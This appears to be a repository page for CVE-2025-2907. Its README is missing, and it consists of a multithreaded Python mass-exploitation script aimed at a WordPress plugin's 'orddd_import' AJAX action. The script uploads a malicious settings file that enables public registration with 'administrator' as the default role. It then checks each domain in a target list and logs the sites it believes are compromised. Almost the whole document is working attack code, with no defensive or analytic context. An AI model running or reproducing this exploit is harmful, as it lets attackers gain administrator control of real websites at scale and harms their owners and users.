README.md
README.md not found for CVE-2025-2907. The file may not exist in the repository.
import requests
import threading
import json
from queue import Queue
from urllib.parse import urljoin
requests.packages.urllib3.disable_warnings()
input_file = "list.txt"
output_file = "result.txt"
THREADS = 10
payload_data = {
"users_can_register": True,
"default_role": "administrator"
}
with open("malicious_settings.json", "w") as f:
json.dump(payload_data, f)
q = Queue()
lock = threading.Lock()
def log_success(domain):
with lock:
with open(output_file, "a") as f:
f.write(domain + "\n")
def exploit(domain):
for scheme in ["http://", "https://"]:
target = scheme + domain
try:
files = {
'action': (None, 'orddd_import'),
'is_drag_drop_request_ajax': (None, 'yes'),
'orddd-import-file': ('malicious_settings.json', open('malicious_settings.json', 'rb'), 'application/json')
}
ajax_url = urljoin(target, "/wp-admin/admin-ajax.php")
r = requests.post(ajax_url, files=files, timeout=15, verify=False)
reg_url = urljoin(target, "/wp-login.php?action=register")
r2 = requests.get(reg_url, timeout=10, verify=False)
if any(keyword in r2.text.lower() for keyword in ["user_login", "user_email", "register"]):
print(f"[+] {target} VULNERABLE and ENABLED register")
log_success(target)
return
except Exception:
pass
def worker():
while not q.empty():
domain = q.get().strip()
if domain:
print(f"[*] Checking {domain}")
exploit(domain)
q.task_done()
def main():
with open(input_file, "r") as f:
for line in f:
q.put(line.strip())
threads = []
for _ in range(THREADS):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
for t in threads:
t.join()
if __name__ == "__main__":
main()